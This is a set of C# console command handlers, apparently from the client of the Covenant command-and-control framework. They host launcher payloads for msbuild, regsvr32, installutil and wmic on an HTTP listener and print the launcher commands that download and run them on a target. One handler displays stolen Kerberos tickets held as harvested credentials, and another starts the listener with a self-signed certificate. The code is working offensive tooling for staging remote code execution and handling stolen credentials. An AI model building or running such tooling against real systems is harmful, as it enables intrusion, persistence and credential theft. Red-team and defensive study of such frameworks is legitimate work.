public override void Command(MenuItem menuItem, string UserInput) { MSBuildLauncherMenuItem msbuildMenuItem = (MSBuildLauncherMenuItem)menuItem; string[] commands = UserInput.Split(" "); if (commands.Length != 2 || commands[0].ToLower() != "host") { menuItem.PrintInvalidOptionError(UserInput); return; } msbuildMenuItem.msbuildLauncher = this.CovenantClient.ApiLaunchersMsbuildPost(); HttpListener listener = this.CovenantClient.ApiListenersHttpByIdGet(msbuildMenuItem.msbuildLauncher.ListenerId ?? default); if (listener == null) { EliteConsole.PrintFormattedErrorLine("Can only host a file on a valid HttpListener."); menuItem.PrintInvalidOptionError(UserInput); return; } HostedFile fileToHost = new HostedFile { ListenerId = listener.Id, Path = commands[1], Content = Convert.ToBase64String(Common.CovenantEncoding.GetBytes(msbuildMenuItem.msbuildLauncher.DiskCode)) }; fileToHost = this.CovenantClient.ApiListenersByIdHostedfilesPost(listener.Id ?? default, fileToHost); msbuildMenuItem.msbuildLauncher = this.CovenantClient.ApiLaunchersMsbuildHostedPost(fileToHost); Uri hostedLocation = new Uri(listener.Url + fileToHost.Path); EliteConsole.PrintFormattedHighlightLine("MSBuildLauncher hosted at: " + hostedLocation); EliteConsole.PrintFormattedWarningLine("msbuild.exe cannot execute remotely hosted files, the payload must first be written to disk"); EliteConsole.PrintFormattedInfoLine("Launcher: " + msbuildMenuItem.msbuildLauncher.LauncherString); }
public override void Command(MenuItem menuItem, string UserInput) { Regsvr32LauncherMenuItem regsvr32MenuItem = (Regsvr32LauncherMenuItem)menuItem; string[] commands = UserInput.Split(" "); if (commands.Length != 2 || commands[0].ToLower() != "host") { menuItem.PrintInvalidOptionError(UserInput); return; } regsvr32MenuItem.regsvr32Launcher = this.CovenantClient.ApiLaunchersRegsvr32Post(); HttpListener listener = this.CovenantClient.ApiListenersHttpByIdGet(regsvr32MenuItem.regsvr32Launcher.ListenerId ?? default); if (listener == null) { EliteConsole.PrintFormattedErrorLine("Can only host a file on a valid HttpListener."); menuItem.PrintInvalidOptionError(UserInput); return; } HostedFile fileToHost = new HostedFile { ListenerId = listener.Id, Path = commands[1], Content = Convert.ToBase64String(Common.CovenantEncoding.GetBytes(regsvr32MenuItem.regsvr32Launcher.DiskCode)) }; fileToHost = this.CovenantClient.ApiListenersByIdHostedfilesPost(listener.Id ?? default, fileToHost); regsvr32MenuItem.regsvr32Launcher = this.CovenantClient.ApiLaunchersRegsvr32HostedPost(fileToHost); Uri hostedLocation = new Uri(listener.Url + fileToHost.Path); EliteConsole.PrintFormattedHighlightLine("Regsvr32Launcher hosted at: " + hostedLocation); EliteConsole.PrintFormattedInfoLine("Launcher: " + regsvr32MenuItem.regsvr32Launcher.LauncherString); }
public override void Command(MenuItem menuItem, string UserInput) { InstallUtilLauncherMenuItem installutilMenuItem = (InstallUtilLauncherMenuItem)menuItem; string[] commands = UserInput.Split(" "); if (commands.Length != 2 || commands[0].ToLower() != "host") { menuItem.PrintInvalidOptionError(UserInput); return; } installutilMenuItem.installutilLauncher = this.CovenantClient.ApiLaunchersInstallutilPost(); HttpListener listener = this.CovenantClient.ApiListenersHttpByIdGet(installutilMenuItem.installutilLauncher.ListenerId ?? default); if (listener == null) { EliteConsole.PrintFormattedErrorLine("Can only host a file on a valid HttpListener."); menuItem.PrintInvalidOptionError(UserInput); return; } HostedFile fileToHost = new HostedFile { ListenerId = listener.Id, Path = commands[1], Content = installutilMenuItem.installutilLauncher.DiskCode }; fileToHost = this.CovenantClient.ApiListenersByIdHostedfilesPost(listener.Id ?? default, fileToHost); installutilMenuItem.installutilLauncher = this.CovenantClient.ApiLaunchersInstallutilHostedPost(fileToHost); Uri hostedLocation = new Uri(listener.Url + fileToHost.Path); EliteConsole.PrintFormattedHighlightLine("InstallUtilLauncher hosted at: " + hostedLocation); EliteConsole.PrintFormattedWarningLine("installutil.exe cannot execute remotely hosted files, the payload must first be written to disk"); EliteConsole.PrintFormattedInfoLine("Launcher: " + installutilMenuItem.installutilLauncher.LauncherString); }
public override void Command(MenuItem menuItem, string UserInput) { try { string[] commands = UserInput.Split(" "); if (commands.Length != 2 || !commands[0].Equals(this.Name, StringComparison.OrdinalIgnoreCase)) { menuItem.PrintInvalidOptionError(UserInput); return; } this.CovenantClient.ApiLaunchersMshtaPost(); WmicLauncher launcher = ((WmicLauncherMenuItem)menuItem).WmicLauncher; HttpListener listener = this.CovenantClient.ApiListenersHttpByIdGet(launcher.ListenerId ?? default); if (listener == null) { EliteConsole.PrintFormattedErrorLine("Can only host a file on a valid HttpListener."); menuItem.PrintInvalidOptionError(UserInput); return; } if (!commands[1].EndsWith(".xsl", StringComparison.Ordinal)) { EliteConsole.PrintFormattedErrorLine("WmicLaunchers must end with the extension: .xsl"); menuItem.PrintInvalidOptionError(UserInput); return; } HostedFile fileToHost = new HostedFile { ListenerId = listener.Id, Path = commands[1], Content = Convert.ToBase64String(Common.CovenantEncoding.GetBytes(launcher.DiskCode)) }; fileToHost = this.CovenantClient.ApiListenersByIdHostedfilesPost(listener.Id ?? default, fileToHost); launcher = this.CovenantClient.ApiLaunchersWmicHostedPost(fileToHost); Uri hostedLocation = new Uri(listener.Url + fileToHost.Path); EliteConsole.PrintFormattedHighlightLine("WmicLauncher hosted at: " + hostedLocation); EliteConsole.PrintFormattedInfoLine("Launcher (cmd.exe): " + launcher.LauncherString); EliteConsole.PrintFormattedInfoLine("Launcher (powershell.exe): " + launcher.LauncherString.Replace("\"", "`\"")); } catch (HttpOperationException e) { EliteConsole.PrintFormattedWarningLine("CovenantException: " + e.Response.Content); } }
public override void Command(MenuItem menuItem, string UserInput) { WmicLauncherMenuItem wmicMenuItem = (WmicLauncherMenuItem)menuItem; string[] commands = UserInput.Split(" "); if (commands.Length != 2 || commands[0].ToLower() != "host") { menuItem.PrintInvalidOptionError(UserInput); return; } wmicMenuItem.wmicLauncher = this.CovenantClient.ApiLaunchersWmicPost(); HttpListener listener = this.CovenantClient.ApiListenersHttpByIdGet(wmicMenuItem.wmicLauncher.ListenerId ?? default); if (listener == null) { EliteConsole.PrintFormattedErrorLine("Can only host a file on a valid HttpListener."); menuItem.PrintInvalidOptionError(UserInput); return; } if (!commands[1].EndsWith(".xsl")) { EliteConsole.PrintFormattedErrorLine("WmicLaunchers must end with the extension: .xsl"); menuItem.PrintInvalidOptionError(UserInput); return; } HostedFile fileToHost = new HostedFile { ListenerId = listener.Id, Path = commands[1], Content = Convert.ToBase64String(Common.CovenantEncoding.GetBytes(wmicMenuItem.wmicLauncher.DiskCode)) }; fileToHost = this.CovenantClient.ApiListenersByIdHostedfilesPost(listener.Id ?? default, fileToHost); wmicMenuItem.wmicLauncher = this.CovenantClient.ApiLaunchersWmicHostedPost(fileToHost); Uri hostedLocation = new Uri(listener.Url + fileToHost.Path); EliteConsole.PrintFormattedHighlightLine("WmicLauncher hosted at: " + hostedLocation); EliteConsole.PrintFormattedInfoLine("Launcher (cmd.exe): " + wmicMenuItem.wmicLauncher.LauncherString); EliteConsole.PrintFormattedInfoLine("Launcher (powershell.exe): " + wmicMenuItem.wmicLauncher.LauncherString.Replace("\"", "`\"")); }
public override void Command(MenuItem menuItem, string UserInput) { CredentialsMenuItem credentialsMenuItem = (CredentialsMenuItem)menuItem; List <string> commands = Utilities.ParseParameters(UserInput); if (commands.Count() != 2) { EliteConsole.PrintFormattedErrorLine("Invalid Ticket command. Usage is: Ticket <ticket_id>"); EliteConsole.PrintFormattedErrorLine("Valid Ticket IDs are: " + String.Join(", ", credentialsMenuItem.TicketCredentials.Select(T => T.Id.ToString()))); } else if (!credentialsMenuItem.TicketCredentials.Select(T => T.Id.ToString()).Contains(commands[1])) { EliteConsole.PrintFormattedErrorLine("Invalid Ticket command. Usage is: Ticket <ticket_id>"); EliteConsole.PrintFormattedErrorLine("Valid Ticket IDs are: " + String.Join(", ", credentialsMenuItem.TicketCredentials.Select(T => T.Id.ToString()))); } else { EliteConsole.PrintFormattedInfoLine($"Ticket ID: {commands[1]} Base64EncodedTicket:"); EliteConsole.PrintInfoLine(credentialsMenuItem.TicketCredentials.FirstOrDefault(T => T.Id.ToString().Equals(commands[1], StringComparison.OrdinalIgnoreCase)).Ticket); } }
public override void Command(MenuItem menuItem, string UserInput) { try { string[] commands = UserInput.Split(" "); if (commands.Length != 2 || !commands[0].Equals(this.Name, StringComparison.OrdinalIgnoreCase)) { menuItem.PrintInvalidOptionError(UserInput); return; } this.CovenantClient.ApiLaunchersMsbuildPost(); menuItem.Refresh(); MSBuildLauncher launcher = ((MSBuildLauncherMenuItem)menuItem).MSBuildLauncher; HttpListener listener = this.CovenantClient.ApiListenersHttpByIdGet(launcher.ListenerId ?? default); if (listener == null) { EliteConsole.PrintFormattedErrorLine("Can only host a file on a valid HttpListener."); menuItem.PrintInvalidOptionError(UserInput); return; } HostedFile fileToHost = new HostedFile { ListenerId = listener.Id, Path = commands[1], Content = Convert.ToBase64String(Common.CovenantEncoding.GetBytes(launcher.DiskCode)) }; fileToHost = this.CovenantClient.ApiListenersByIdHostedfilesPost(listener.Id ?? default, fileToHost); launcher = this.CovenantClient.ApiLaunchersMsbuildHostedPost(fileToHost); Uri hostedLocation = new Uri(listener.Url + fileToHost.Path); EliteConsole.PrintFormattedHighlightLine("MSBuildLauncher hosted at: " + hostedLocation); EliteConsole.PrintFormattedWarningLine("msbuild.exe cannot execute remotely hosted files, the payload must first be written to disk"); EliteConsole.PrintFormattedInfoLine("Launcher: " + launcher.LauncherString); } catch (HttpOperationException e) { EliteConsole.PrintFormattedWarningLine("CovenantException: " + e.Response.Content); } }
public override void Command(MenuItem menuItem, string UserInput) { HTTPListenerMenuItem httpListenerMenuItem = (HTTPListenerMenuItem)menuItem; // TODO: error if http lsitener already on this port if ((httpListenerMenuItem.httpListener.UseSSL ?? default) && (httpListenerMenuItem.httpListener.SslCertHash == "" || httpListenerMenuItem.httpListener.SslCertificate == "")) { EliteConsole.PrintWarning("No SSLCertificate specified. Would you like to generate and use a self-signed certificate? [y/N] "); string input = EliteConsole.Read(); if (input.ToLower().StartsWith("y")) { X509Certificate2 certificate = Utilities.CreateSelfSignedCertificate(httpListenerMenuItem.httpListener.BindAddress); string autopath = "httplistener-" + httpListenerMenuItem.httpListener.Id + "-certificate.pfx"; File.WriteAllBytes(Path.Combine(Common.EliteDataFolder, autopath), certificate.Export(X509ContentType.Pfx, httpListenerMenuItem.httpListener.SslCertificatePassword)); EliteConsole.PrintFormattedInfoLine("Certificate written to: " + autopath); httpListenerMenuItem.AdditionalOptions.FirstOrDefault(O => O.Name == "Set").Command(httpListenerMenuItem, "Set SSLCertPath " + autopath); } else { EliteConsole.PrintFormattedErrorLine("Must specify an SSLCertfiicate to Start an HTTP Listener with SSL."); return; } } httpListenerMenuItem.Refresh(); httpListenerMenuItem.httpListener.Status = ListenerStatus.Active; httpListenerMenuItem.httpListener = this.CovenantClient.ApiListenersHttpPut(httpListenerMenuItem.httpListener); EventModel eventModel = new EventModel { Message = "Started HTTP Listener: " + httpListenerMenuItem.httpListener.Name + " at: " + httpListenerMenuItem.httpListener.Url, Level = EventLevel.Highlight, Context = "*" }; eventModel = this.CovenantClient.ApiEventsPost(eventModel); this.EventPrinter.PrintEvent(eventModel); httpListenerMenuItem.RefreshHTTPTemplate(); httpListenerMenuItem.Refresh(); }